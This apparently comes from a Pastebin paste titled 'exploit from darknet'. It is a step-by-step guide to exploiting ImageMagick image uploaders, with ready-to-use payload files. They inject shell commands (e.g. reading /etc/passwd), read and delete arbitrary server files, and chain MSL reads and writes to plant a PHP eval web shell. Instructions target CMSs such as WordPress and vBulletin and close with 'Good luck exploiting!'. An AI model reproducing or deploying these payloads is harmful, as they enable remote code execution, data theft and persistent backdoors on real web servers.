API tools faq
paste
Advertisement
4GETmeICA

exploit from darknet

4GETmeICA
Apr 5th, 2017
499
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.43 KB | None | 0 0
raw download clone embed print report
  1. [+]======================================================================[+]
  2. [|] Exploiting ImageMagick [|]
  3. [|] By @DigitalGangster [|]
  4. [+]======================================================================[+]
  5. [|] What is it? [|]
  6. [+]======================================================================[+]
  7. [|] [|]
  8. [|] ImageMagick is a popular software used to convert, edit [|]
  9. [|] and manipulate images. It has libraries for all common [|]
  10. [|] programming languages, including PHP, Python, Ruby and [|]
  11. [|] many others. It is also very simple to use, which lead it [|]
  12. [|] to be used by many developers when in need of image [|]
  13. [|] cropping or manipulation. [|]
  14. [|] [|]
  15. [+]======================================================================[+]
  16. [|] Vulnerability [|]
  17. [+]======================================================================[+]
  18. [|] [|]
  19. [|] ImageMagick doesn’t properly filter the file names that [|]
  20. [|] get passed to the internal delegates that handle external [|]
  21. [|] protocols (ex. HTTPS)This allows an attacker to execute [|]
  22. [|] commands remotely by uploading an image. This leads to a [|]
  23. [|] full RCE vulnerability in your image uploader. [|]
  24. [|] [|]
  25. [+]======================================================================[+]
  26. [|] Exploit Code [|]
  27. [+]======================================================================[+]
  28. [|] Should work for all image files (.jpg/.mvg/.svg/.png/etc.) [|]
  29. [+] Exploit Image contents: [|]
  30. [|] [|]
  31. [|] push graphic-context [|]
  32. [|] viewbox 0 0 640 480 [|]
  33. [|] fill 'url(https://example.com/image.jpg "|YOUR COMMAND HERE")' [|]
  34. [|] [|]
  35. [+] Example Image: [|]
  36. [|] [|]
  37. [|] push graphic-context [|]
  38. [|] viewbox 0 0 640 480 [|]
  39. [|] fill 'url(https://example.com/image.jpg "|cat /etc/passwd")' [|]
  40. [|] pop graphic-context [|]
  41. [|] [|]
  42. [|] More examples: https://ghostbin.com/paste/vd3u5 [|]
  43. [+]======================================================================[+]
  44. [|] How to Exploit [|]
  45. [+]======================================================================[+]
  46. [|] [|]
  47. [|] 1. Find an Image uploader that uses ImageMagick to process images. [|]
  48. [|] (Try it @ http://attack32.samsclass.info/im.htm) [|]
  49. [|] 2. Craft a malicious image file [|]
  50. [|] 3. If it is running a vulnerable version, you'll have full RCE! [|]
  51. [|] [|]
  52. [|] Sometimes popular CMS' such as vBulletin, myBB, and WordPress [|]
  53. [|] implement ImageMagick to process user images! [|]
  54. [|] [|]
  55. [|] Good luck exploiting! [|]
  56. [|] -@DigitalGangster [|]
  57. [+]======================================================================[+]
  58.  
  59.  
  60. # Digital Gangster [2016-05-13]
  61. ImageMagick is vulnerable to a variety of attacks that allow reading, deleting,
  62. and writing files.
  63.  
  64. Here are some useful trick to complement the fill 'url()' vulnerability
  65. described by @DigitalGangster
  66.  
  67. == 1 ==
  68.  
  69. It's possible to read arbitrary files from a web server by uploading an
  70. ImageMagick Vector Graphics file (MVG) that the web application processes with
  71. ImageMagick:
  72.  
  73. push graphic-context
  74. viewbox 0 0 1024 1024
  75. image over 0,0 0,0 'label:@/etc/passwd'
  76. pop graphic-context
  77.  
  78. As is the case with all of these vulnerabilities, the file doesn't need to be
  79. uploaded with a .mvg extension. You can change it to .png, .jpg, or anything
  80. else.
  81.  
  82. If the file doesn't exist, you'll see the @ symbol plus the filename as the
  83. output.
  84.  
  85.  
  86. == 2 ==
  87.  
  88. You can use a similar technique to delete a file, provided ImageMagick is built
  89. with support for it's ephemeral protocol:
  90.  
  91. push graphic-context
  92. viewbox 0 0 1024 1024
  93. image over 0,0 0,0 'ephemeral:/var/www/index.php'
  94. pop graphic-context
  95.  
  96.  
  97. == 3 ==
  98.  
  99. You can move files around, provided you're able to determine the location of
  100. uploaded files. This can be used to upload new files as well as overwrite
  101. existing files.
  102.  
  103. first_image.png:
  104.  
  105. <?xml version="1.0" encoding="UTF-8"?>
  106. <image>
  107. <read filename="/var/www/uploads/second_image.png"/>
  108. <write filename="/var/www/hi.php"/>
  109. </image>
  110.  
  111.  
  112. second_image.png:
  113.  
  114. push graphic-context
  115. viewbox 0 0 1024 1024
  116. image over 0,0 0,0 'label:<?php if($_SERVER["REQUEST_METHOD"]=="POST")eval(file_get_contents("php://input")); ?>'
  117. pop graphic-context
  118.  
  119.  
  120. third_image.png:
  121.  
  122. push graphic-context
  123. viewbox 0 0 1024 1024
  124. image over 0,0 0,0 'msl:/var/www/uploads/first_image.png'
  125. pop graphic-context
  126.  
  127.  
  128. # Digital Gangster [2016-05-16]
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!